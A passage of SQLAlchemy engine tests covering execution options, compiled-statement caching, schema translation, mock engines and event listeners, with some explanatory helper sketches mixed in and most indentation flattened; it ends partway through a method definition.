def test_dont_wrap_mixin(self):
class MyException(Exception, tsa.exc.DontWrapMixin):
pass
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise MyException("nope")
def _go(conn):
assert_raises_message(
MyException,
"nope",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
conn = testing.db.connect()
try:
_go(conn)
finally:
conn.close()
def test_empty_insert(self, connection):
"""test that execute() interprets [] as a list with no params"""
users_autoinc = self.tables.users_autoinc
connection.execute(
users_autoinc.insert().values(user_name=bindparam("name", None)),
[],
)
eq_(connection.execute(users_autoinc.select()).fetchall(), [(1, None)])
@testing.only_on("sqlite")
def test_execute_compiled_favors_compiled_paramstyle(self):
users = self.tables.users
with patch.object(testing.db.dialect, "do_execute") as do_exec:
stmt = users.update().values(user_id=1, user_name="foo")
d1 = default.DefaultDialect(paramstyle="format")
d2 = default.DefaultDialect(paramstyle="pyformat")
with testing.db.begin() as conn:
conn.execute(stmt.compile(dialect=d1))
conn.execute(stmt.compile(dialect=d2))
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_id=%s, user_name=%s",
(1, "foo"),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_id=%(user_id)s, "
"user_name=%(user_name)s",
{"user_name": "foo", "user_id": 1},
mock.ANY,
),
],
)
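    # A short sketch, using the same DefaultDialect(paramstyle=...) trick
    # as the test above, showing how to preview the placeholder style a
    # compiled statement will render with.
    def _sketch_compile_paramstyle(self):
        stmt = select(literal_column("1")).where(column("q") == bindparam("q"))
        qmark = stmt.compile(dialect=default.DefaultDialect(paramstyle="qmark"))
        named = stmt.compile(dialect=default.DefaultDialect(paramstyle="named"))
        assert "?" in str(qmark)  # qmark renders "?" placeholders
        assert ":q" in str(named)  # named renders ":q"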
@testing.requires.ad_hoc_engines
def test_engine_level_options(self):
eng = engines.testing_engine(
options={"execution_options": {"foo": "bar"}}
)
with eng.connect() as conn:
eq_(conn._execution_options["foo"], "bar")
eq_(
conn.execution_options(bat="hoho")._execution_options["foo"],
"bar",
)
eq_(
conn.execution_options(bat="hoho")._execution_options["bat"],
"hoho",
)
eq_(
conn.execution_options(foo="hoho")._execution_options["foo"],
"hoho",
)
eng.update_execution_options(foo="hoho")
conn = eng.connect()
eq_(conn._execution_options["foo"], "hoho")
@testing.requires.ad_hoc_engines
def test_generative_engine_execution_options(self):
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
is_(eng.engine, eng)
eng1 = eng.execution_options(foo="b1")
is_(eng1.engine, eng1)
eng2 = eng.execution_options(foo="b2")
eng1a = eng1.execution_options(bar="a1")
eng2a = eng2.execution_options(foo="b3", bar="a2")
is_(eng2a.engine, eng2a)
eq_(eng._execution_options, {"base": "x1"})
eq_(eng1._execution_options, {"base": "x1", "foo": "b1"})
eq_(eng2._execution_options, {"base": "x1", "foo": "b2"})
eq_(eng1a._execution_options, {"base": "x1", "foo": "b1", "bar": "a1"})
eq_(eng2a._execution_options, {"base": "x1", "foo": "b3", "bar": "a2"})
is_(eng1a.pool, eng.pool)
# test pool is shared
eng2.dispose()
is_(eng1a.pool, eng2.pool)
is_(eng.pool, eng2.pool)
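    # A brief usage sketch of the same mechanism: the option engine is a
    # cheap overlay on its parent, so per-call-site tuning does not
    # allocate a second connection pool.
    def _sketch_option_engine_shares_pool(self):
        eng = engines.testing_engine()
        tuned = eng.execution_options(stream_results=True)
        is_(tuned.pool, eng.pool)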
@testing.requires.ad_hoc_engines
def test_autocommit_option_no_issue_first_connect(self):
eng = create_engine(testing.db.url)
eng.update_execution_options(autocommit=True)
conn = eng.connect()
eq_(conn._execution_options, {"autocommit": True})
conn.close()
def test_initialize_rollback(self):
"""test a rollback happens during first connect"""
eng = create_engine(testing.db.url)
with patch.object(eng.dialect, "do_rollback") as do_rollback:
assert do_rollback.call_count == 0
connection = eng.connect()
assert do_rollback.call_count == 1
connection.close()
@testing.requires.ad_hoc_engines
def test_dialect_init_uses_options(self):
eng = create_engine(testing.db.url)
def my_init(connection):
connection.execution_options(foo="bar").execute(select(1))
with patch.object(eng.dialect, "initialize", my_init):
conn = eng.connect()
eq_(conn._execution_options, {})
conn.close()
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch_hasevents(self):
def l1(*arg, **kw):
pass
eng = create_engine(testing.db.url)
assert not eng._has_events
event.listen(eng, "before_execute", l1)
eng2 = eng.execution_options(foo="bar")
assert eng2._has_events
def test_works_after_dispose(self):
eng = create_engine(testing.db.url)
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_works_after_dispose_testing_engine(self):
eng = engines.testing_engine()
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_scalar(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalar(select(users.c.user_name).order_by(users.c.user_id))
eq_(res, "sandy")
def test_scalars(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalars(select(users.c.user_name).order_by(users.c.user_id))
eq_(res.all(), ["sandy", "spongebob"])
@testing.combinations(
({}, {}, {}),
({"a": "b"}, {}, {"a": "b"}),
({"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
argnames="conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke(
self, connection, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_cursor_execute")
def before_cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
opts.append(context.execution_options)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(select(1), execution_options=exec_opts)
else:
connection.execute(select(1))
eq_(opts, [expected])
@testing.combinations(
({}, {}, {}, {}),
({}, {"a": "b"}, {}, {"a": "b"}),
({}, {"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
(
{"q": "z", "p": "r"},
{"a": "b", "p": "x", "d": "e"},
{"a": "c"},
{"q": "z", "p": "x", "a": "c", "d": "e"},
),
argnames="stmt_opts, conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke_execute_events(
self, connection, stmt_opts, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_execute")
def before_execute(
conn, clauseelement, multiparams, params, execution_options
):
opts.append(("before", execution_options))
@event.listens_for(connection, "after_execute")
def after_execute(
conn,
clauseelement,
multiparams,
params,
execution_options,
result,
):
opts.append(("after", execution_options))
stmt = select(1)
if stmt_opts:
stmt = stmt.execution_options(**stmt_opts)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(stmt, execution_options=exec_opts)
else:
connection.execute(stmt)
eq_(opts, [("before", expected), ("after", expected)])
@testing.combinations(
({"user_id": 1, "user_name": "name1"},),
([{"user_id": 1, "user_name": "name1"}],),
(({"user_id": 1, "user_name": "name1"},),),
(
[
{"user_id": 1, "user_name": "name1"},
{"user_id": 2, "user_name": "name2"},
],
),
argnames="parameters",
)
def test_params_interpretation(self, connection, parameters):
users = self.tables.users
connection.execute(users.insert(), parameters)
class ConvenienceExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
cls.table = Table(
"exec_test",
metadata,
Column("a", Integer),
Column("b", Integer),
test_needs_acid=True,
)
def _trans_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
return go
def _trans_rollback_fn(self, is_transaction=False):
def go(conn, x, value=None):
if is_transaction:
conn = conn.connection
conn.execute(self.table.insert().values(a=x, b=value))
raise SomeException("breakage")
return go
def _assert_no_data(self):
with testing.db.connect() as conn:
eq_(
conn.scalar(select(func.count("*")).select_from(self.table)),
0,
)
def _assert_fn(self, x, value=None):
with testing.db.connect() as conn:
eq_(conn.execute(self.table.select()).fetchall(), [(x, value)])
def test_transaction_engine_ctx_commit(self):
fn = self._trans_fn()
ctx = testing.db.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_engine_ctx_begin_fails_dont_enter_enter(self):
"""test #7272"""
engine = engines.testing_engine()
mock_connection = Mock(
return_value=Mock(begin=Mock(side_effect=Exception("boom")))
)
with mock.patch.object(engine, "_connection_cls", mock_connection):
# context manager isn't entered, doesn't actually call
# connect() or connection.begin()
engine.begin()
eq_(mock_connection.return_value.close.mock_calls, [])
def test_transaction_engine_ctx_begin_fails_include_enter(self):
"""test #7272
Note this behavior for 2.0 required that we add a new flag to
Connection _allow_autobegin=False, so that the first-connect
initialization sequence in create.py does not actually run begin()
        events. Previously, the initialize sequence used a future=False
connection unconditionally (and I didn't notice this).
"""
engine = engines.testing_engine()
close_mock = Mock()
with mock.patch.object(
engine._connection_cls,
"begin",
Mock(side_effect=Exception("boom")),
), mock.patch.object(engine._connection_cls, "close", close_mock):
with expect_raises_message(Exception, "boom"):
with engine.begin():
pass
eq_(close_mock.mock_calls, [call()])
def test_transaction_engine_ctx_rollback(self):
fn = self._trans_rollback_fn()
ctx = testing.db.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_transaction_connection_ctx_commit(self):
fn = self._trans_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
testing.run_as_contextmanager(ctx, fn, 5, value=8)
self._assert_fn(5, value=8)
def test_transaction_connection_ctx_rollback(self):
fn = self._trans_rollback_fn(True)
with testing.db.connect() as conn:
ctx = conn.begin()
assert_raises_message(
Exception,
"breakage",
testing.run_as_contextmanager,
ctx,
fn,
5,
value=8,
)
self._assert_no_data()
def test_connection_as_ctx(self):
fn = self._trans_fn()
with testing.db.begin() as conn:
fn(conn, 5, value=8)
self._assert_fn(5, value=8)
class CompiledCacheTest(fixtures.TestBase):
__backend__ = True
def test_cache(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
conn = connection
cache = {}
cached_conn = conn.execution_options(compiled_cache=cache)
ins = users.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"user_name": "u1"})
cached_conn.execute(ins, {"user_name": "u2"})
cached_conn.execute(ins, {"user_name": "u3"})
eq_(compile_mock.call_count, 1)
assert len(cache) == 1
eq_(conn.exec_driver_sql("select count(*) from users").scalar(), 3)
@testing.only_on(
["sqlite", "mysql", "postgresql"],
"uses blob value that is problematic for some DBAPIs",
)
def test_cache_noleak_on_statement_values(self, metadata, connection):
# This is a non regression test for an object reference leak caused
# by the compiled_cache.
photo = Table(
"photo",
metadata,
Column(
"id", Integer, primary_key=True, test_needs_autoincrement=True
),
Column("photo_blob", LargeBinary()),
)
metadata.create_all(connection)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
class PhotoBlob(bytearray):
pass
blob = PhotoBlob(100)
ref_blob = weakref.ref(blob)
ins = photo.insert()
with patch.object(
ins, "_compiler", Mock(side_effect=ins._compiler)
) as compile_mock:
cached_conn.execute(ins, {"photo_blob": blob})
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
eq_(
connection.exec_driver_sql("select count(*) from photo").scalar(),
1,
)
del blob
gc_collect()
        # The compiled statement cache should not hold any reference to
        # the statement values (only the keys).
eq_(ref_blob(), None)
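    # A general-purpose sketch of the leak-check pattern used above: keep
    # only a weak reference, delete the strong reference, force a GC
    # pass, then assert the weakref has gone dead.
    def _sketch_weakref_leak_check(self):
        class Payload:
            pass
        obj = Payload()
        ref = weakref.ref(obj)
        del obj
        gc_collect()
        eq_(ref(), None)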
def test_keys_independent_of_ordering(self, connection, metadata):
users = Table(
"users",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
Column("extra_data", VARCHAR(20)),
)
users.create(connection)
connection.execute(
users.insert(),
{"user_id": 1, "user_name": "u1", "extra_data": "e1"},
)
cache = {}
cached_conn = connection.execution_options(compiled_cache=cache)
upd = users.update().where(users.c.user_id == bindparam("b_user_id"))
with patch.object(
upd, "_compiler", Mock(side_effect=upd._compiler)
) as compile_mock:
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("user_name", "u2"),
("extra_data", "e2"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("b_user_id", 1),
("extra_data", "e3"),
("user_name", "u3"),
]
),
)
cached_conn.execute(
upd,
util.OrderedDict(
[
("extra_data", "e4"),
("user_name", "u4"),
("b_user_id", 1),
]
),
)
eq_(compile_mock.call_count, 1)
eq_(len(cache), 1)
@testing.requires.schemas
def test_schema_translate_in_key(self, metadata, connection):
Table("x", metadata, Column("q", Integer))
Table("x", metadata, Column("q", Integer), schema=config.test_schema)
metadata.create_all(connection)
m = MetaData()
t1 = Table("x", m, Column("q", Integer))
ins = t1.insert()
stmt = select(t1.c.q)
cache = {}
conn = connection.execution_options(compiled_cache=cache)
conn.execute(ins, {"q": 1})
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: config.test_schema},
)
conn.execute(ins, {"q": 2})
eq_(conn.scalar(stmt), 2)
conn = connection.execution_options(
compiled_cache=cache,
schema_translate_map={None: None},
)
# should use default schema again even though statement
# was compiled with test_schema in the map
eq_(conn.scalar(stmt), 1)
conn = connection.execution_options(
compiled_cache=cache,
)
eq_(conn.scalar(stmt), 1)
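    # A minimal usage sketch (the schema name "tenant_a" is hypothetical):
    # schema_translate_map rewrites schema names at execution time, so one
    # set of Table metadata can serve several schemas, and as shown above
    # the translate state participates in the compiled-cache key.
    def _sketch_schema_translate_usage(self, connection):
        conn = connection.execution_options(
            schema_translate_map={None: "tenant_a"}
        )
        # any schema-less Table executed via `conn` now renders with the
        # "tenant_a" schema prefix
        return conn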
class MockStrategyTest(fixtures.TestBase):
def _engine_fixture(self):
buf = StringIO()
def dump(sql, *multiparams, **params):
buf.write(str(sql.compile(dialect=engine.dialect)))
engine = create_mock_engine("postgresql+psycopg2://", executor=dump)
return engine, buf
def test_sequence_not_duped(self):
engine, buf = self._engine_fixture()
metadata = MetaData()
t = Table(
"testtable",
metadata,
Column(
"pk",
Integer,
Sequence("testtable_pk_seq"),
primary_key=True,
),
)
t.create(engine)
t.drop(engine)
eq_(re.findall(r"CREATE (\w+)", buf.getvalue()), ["SEQUENCE", "TABLE"])
eq_(re.findall(r"DROP (\w+)", buf.getvalue()), ["TABLE", "SEQUENCE"])
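# A minimal sketch of the "mock engine" technique exercised above:
# create_mock_engine() never opens a real connection; it hands each
# construct to the executor callable, which makes it handy for dumping a
# DDL script offline.
def _sketch_dump_ddl():
    buf = StringIO()
    def dump(sql, *multiparams, **params):
        buf.write(str(sql.compile(dialect=engine.dialect)) + ";\n")
    engine = create_mock_engine("postgresql+psycopg2://", executor=dump)
    md = MetaData()
    Table("example", md, Column("id", Integer, primary_key=True))
    md.create_all(engine)
    return buf.getvalue()  # the CREATE TABLE statement as text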
class SchemaTranslateTest(fixtures.TestBase, testing.AssertsExecutionResults):
__requires__ = ("schemas",)
__backend__ = True
@testing.fixture
def plain_tables(self, metadata):
t1 = Table(
"t1", metadata, Column("x", Integer), schema=config.test_schema
)
t2 = Table(
"t2", metadata, Column("x", Integer), schema=config.test_schema
)
t3 = Table("t3", metadata, Column("x", Integer), schema=None)
return t1, t2, t3
def test_create_table(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
t1.create(conn)
t2.create(conn)
t3.create(conn)
t3.drop(conn)
t2.drop(conn)
t1.drop(conn)
asserter.assert_(
CompiledSQL("CREATE TABLE __[SCHEMA__none].t1 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_foo].t2 (x INTEGER)"),
CompiledSQL("CREATE TABLE __[SCHEMA_bar].t3 (x INTEGER)"),
CompiledSQL("DROP TABLE __[SCHEMA_bar].t3"),
CompiledSQL("DROP TABLE __[SCHEMA_foo].t2"),
CompiledSQL("DROP TABLE __[SCHEMA__none].t1"),
)
def test_ddl_hastable(self, plain_tables, connection):
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
Table("t1", metadata, Column("x", Integer))
Table("t2", metadata, Column("x", Integer), schema="foo")
Table("t3", metadata, Column("x", Integer), schema="bar")
conn = connection.execution_options(schema_translate_map=map_)
metadata.create_all(conn)
insp = inspect(connection)
is_true(insp.has_table("t1", schema=config.test_schema))
is_true(insp.has_table("t2", schema=config.test_schema))
is_true(insp.has_table("t3", schema=None))
conn = connection.execution_options(schema_translate_map=map_)
# if this test fails, the tables won't get dropped. so need a
# more robust fixture for this
metadata.drop_all(conn)
insp = inspect(connection)
is_false(insp.has_table("t1", schema=config.test_schema))
is_false(insp.has_table("t2", schema=config.test_schema))
is_false(insp.has_table("t3", schema=None))
def test_option_on_execute(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection
execution_options = {"schema_translate_map": map_}
conn.execute(
t1.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t2.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t3.insert(), {"x": 1}, execution_options=execution_options
)
conn.execute(
t1.update().values(x=1).where(t1.c.x == 1),
execution_options=execution_options,
)
conn.execute(
t2.update().values(x=2).where(t2.c.x == 1),
execution_options=execution_options,
)
conn.execute(
t3.update().values(x=3).where(t3.c.x == 1),
execution_options=execution_options,
)
eq_(
conn.execute(
select(t1.c.x), execution_options=execution_options
).scalar(),
1,
)
eq_(
conn.execute(
select(t2.c.x), execution_options=execution_options
).scalar(),
2,
)
eq_(
conn.execute(
select(t3.c.x), execution_options=execution_options
).scalar(),
3,
)
conn.execute(t1.delete(), execution_options=execution_options)
conn.execute(t2.delete(), execution_options=execution_options)
conn.execute(t3.delete(), execution_options=execution_options)
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_crud(self, plain_tables, connection):
# provided by metadata fixture provided by plain_tables fixture
self.metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t1 = Table("t1", metadata, Column("x", Integer))
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
t3 = Table("t3", metadata, Column("x", Integer), schema="bar")
with self.sql_execution_asserter(connection) as asserter:
conn = connection.execution_options(schema_translate_map=map_)
conn.execute(t1.insert(), {"x": 1})
conn.execute(t2.insert(), {"x": 1})
conn.execute(t3.insert(), {"x": 1})
conn.execute(t1.update().values(x=1).where(t1.c.x == 1))
conn.execute(t2.update().values(x=2).where(t2.c.x == 1))
conn.execute(t3.update().values(x=3).where(t3.c.x == 1))
eq_(conn.scalar(select(t1.c.x)), 1)
eq_(conn.scalar(select(t2.c.x)), 2)
eq_(conn.scalar(select(t3.c.x)), 3)
conn.execute(t1.delete())
conn.execute(t2.delete())
conn.execute(t3.delete())
asserter.assert_(
CompiledSQL("INSERT INTO __[SCHEMA__none].t1 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_foo].t2 (x) VALUES (:x)"),
CompiledSQL("INSERT INTO __[SCHEMA_bar].t3 (x) VALUES (:x)"),
CompiledSQL(
"UPDATE __[SCHEMA__none].t1 SET x=:x WHERE "
"__[SCHEMA__none].t1.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_foo].t2 SET x=:x WHERE "
"__[SCHEMA_foo].t2.x = :x_1"
),
CompiledSQL(
"UPDATE __[SCHEMA_bar].t3 SET x=:x WHERE "
"__[SCHEMA_bar].t3.x = :x_1"
),
CompiledSQL(
"SELECT __[SCHEMA__none].t1.x FROM __[SCHEMA__none].t1"
),
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2"),
CompiledSQL("SELECT __[SCHEMA_bar].t3.x FROM __[SCHEMA_bar].t3"),
CompiledSQL("DELETE FROM __[SCHEMA__none].t1"),
CompiledSQL("DELETE FROM __[SCHEMA_foo].t2"),
CompiledSQL("DELETE FROM __[SCHEMA_bar].t3"),
)
def test_via_engine(self, plain_tables, metadata):
with config.db.begin() as connection:
metadata.create_all(connection)
map_ = {
None: config.test_schema,
"foo": config.test_schema,
"bar": None,
}
metadata = MetaData()
t2 = Table("t2", metadata, Column("x", Integer), schema="foo")
with self.sql_execution_asserter(config.db) as asserter:
eng = config.db.execution_options(schema_translate_map=map_)
with eng.connect() as conn:
conn.execute(select(t2.c.x))
asserter.assert_(
CompiledSQL("SELECT __[SCHEMA_foo].t2.x FROM __[SCHEMA_foo].t2")
)
class ExecutionOptionsTest(fixtures.TestBase):
def test_dialect_conn_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c2 = conn.execution_options(foo="bar")
eq_(
engine.dialect.set_connection_execution_options.mock_calls,
[call(c2, {"foo": "bar"})],
)
def test_dialect_engine_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(
engine.dialect.set_engine_execution_options.mock_calls,
[call(e2, {"foo": "bar"})],
)
def test_dialect_engine_construction_options(self):
dialect = Mock()
engine = Engine(
Mock(), dialect, Mock(), execution_options={"foo": "bar"}
)
eq_(
dialect.set_engine_execution_options.mock_calls,
[call(engine, {"foo": "bar"})],
)
def test_propagate_engine_to_connection(self, testing_engine):
engine = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
with engine.connect() as conn:
eq_(conn._execution_options, {"foo": "bar"})
def test_propagate_option_engine_to_connection(self, testing_engine):
e1 = testing_engine(
"sqlite://", options=dict(execution_options={"foo": "bar"})
)
e2 = e1.execution_options(bat="hoho")
c1 = e1.connect()
c2 = e2.connect()
eq_(c1._execution_options, {"foo": "bar"})
eq_(c2._execution_options, {"foo": "bar", "bat": "hoho"})
c1.close()
c2.close()
def test_get_engine_execution_options(self, testing_engine):
engine = testing_engine("sqlite://")
engine.dialect = Mock()
e2 = engine.execution_options(foo="bar")
eq_(e2.get_execution_options(), {"foo": "bar"})
def test_get_connection_execution_options(self, testing_engine):
engine = testing_engine("sqlite://", options=dict(_initialize=False))
engine.dialect = Mock()
with engine.connect() as conn:
c = conn.execution_options(foo="bar")
eq_(c.get_execution_options(), {"foo": "bar"})
class EngineEventsTest(fixtures.TestBase):
__requires__ = ("ad_hoc_engines",)
__backend__ = True
def teardown_test(self):
Engine.dispatch._clear()
Engine._has_events = False
def _assert_stmts(self, expected, received):
list(received)
for stmt, params, posn in expected:
if not received:
assert False, "Nothing available for stmt: %s" % stmt
while received:
teststmt, testparams, testmultiparams = received.pop(0)
teststmt = (
re.compile(r"[\n\t ]+", re.M).sub(" ", teststmt).strip()
)
if teststmt.startswith(stmt) and (
testparams == params or testparams == posn
):
break
def test_engine_connect(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
# use a real def to trigger legacy signature decorator
# logic, if present
def thing(conn):
canary(conn)
event.listen(e1, "engine_connect", thing)
c1 = e1.connect()
c1.close()
c2 = e1.connect()
c2.close()
eq_(canary.mock_calls, [mock.call(c1), mock.call(c2)])
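    # An equivalent decorator-style sketch of the registration above;
    # @event.listens_for is the declarative spelling of event.listen().
    def _sketch_listens_for(self, testing_engine):
        e1 = testing_engine(config.db_url)
        seen = []
        @event.listens_for(e1, "engine_connect")
        def on_connect(conn):
            seen.append(conn)
        with e1.connect():
            pass
        eq_(len(seen), 1)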
def test_per_engine_independence(self, testing_engine):
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
canary = Mock()
event.listen(e1, "before_execute", canary)
s1 = select(1)
s2 = select(2)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1])
event.listen(e2, "before_execute", canary)
with e1.connect() as conn:
conn.execute(s1)
with e2.connect() as conn:
conn.execute(s2)
eq_([arg[1][1] for arg in canary.mock_calls], [s1, s1, s2])
def test_per_engine_plus_global(self, testing_engine):
canary = Mock()
event.listen(Engine, "before_execute", canary.be1)
e1 = testing_engine(config.db_url)
e2 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be2)
event.listen(Engine, "before_execute", canary.be3)
with e1.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
with e2.connect() as conn:
conn.execute(select(1))
eq_(canary.be1.call_count, 2)
eq_(canary.be2.call_count, 1)
eq_(canary.be3.call_count, 2)
def test_emit_sql_in_autobegin(self, testing_engine):
e1 = testing_engine(config.db_url)
canary = Mock()
@event.listens_for(e1, "begin")
def begin(connection):
result = connection.execute(select(1)).scalar()
canary.got_result(result)
with e1.connect() as conn:
conn.execute(select(1)).scalar()
assert conn.in_transaction()
conn.commit()
assert not conn.in_transaction()
eq_(canary.mock_calls, [call.got_result(1)])
def test_per_connection_plus_engine(self, testing_engine):
canary = Mock()
e1 = testing_engine(config.db_url)
event.listen(e1, "before_execute", canary.be1)
conn = e1.connect()
event.listen(conn, "before_execute", canary.be2)
conn.execute(select(1))
eq_(canary.be1.call_count, 1)
eq_(canary.be2.call_count, 1)
@testing.combinations(
(True, False),
(True, True),
(False, False),
argnames="mock_out_on_connect, add_our_own_onconnect",
)
def test_insert_connect_is_definitely_first(
self, mock_out_on_connect, add_our_own_onconnect, testing_engine
):
"""test issue #5708.
We want to ensure that a single "connect" event may be invoked
*before* dialect initialize as well as before dialect on_connects.
This is also partially reliant on the changes we made as a result of
#5497, however here we go further with the changes and remove use
of the pool first_connect() event entirely so that the startup
for a dialect is fully consistent.
"""
if mock_out_on_connect:
if add_our_own_onconnect:
def our_connect(connection):
m1.our_connect("our connect event")
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: our_connect,
)
else:
patcher = mock.patch.object(
config.db.dialect.__class__,
"on_connect",
lambda self: None,
)
else:
patcher = nullcontext()
with patcher:
e1 = testing_engine(config.db_url)
initialize = e1.dialect.initialize
def init(connection):
initialize(connection)
connection.execute(select(1))
            # the begin() mock was added as part of the migration to
            # future-only, where we don't want anything related to
            # begin() happening as part of create.
            # note we can't use an event to ensure begin() is not called,
            # because create also blocks events from happening
with mock.patch.object(
e1.dialect, "initialize", side_effect=init
) as m1, mock.patch.object(
e1._connection_cls, "begin"
) as begin_mock:
@event.listens_for(e1, "connect", insert=True)
def go1(dbapi_conn, xyz):
m1.foo("custom event first")
@event.listens_for(e1, "connect")
def go2(dbapi_conn, xyz):
m1.foo("custom event last")
c1 = e1.connect()
m1.bar("ok next connection")
c2 = e1.connect()
                # this happens with sqlite's SingletonThreadPool. we can
                # almost use testing.requires.independent_connections,
                # but the sqlite file backend will also have independent
                # connections here.
its_the_same_connection = (
c1.connection.dbapi_connection
is c2.connection.dbapi_connection
)
c1.close()
c2.close()
eq_(begin_mock.mock_calls, [])
if add_our_own_onconnect:
calls = [
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
else:
calls = [
mock.call.foo("custom event first"),
mock.call(mock.ANY),
mock.call.foo("custom event last"),
mock.call.bar("ok next connection"),
]
if not its_the_same_connection:
if add_our_own_onconnect:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.our_connect("our connect event"),
mock.call.foo("custom event last"),
]
)
else:
calls.extend(
[
mock.call.foo("custom event first"),
mock.call.foo("custom event last"),
]
)
eq_(m1.mock_calls, calls)
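    # A focused sketch of the ordering guarantee verified above:
    # insert=True prepends a listener, so it fires ahead of listeners
    # registered earlier.
    def _sketch_insert_listener_ordering(self, testing_engine):
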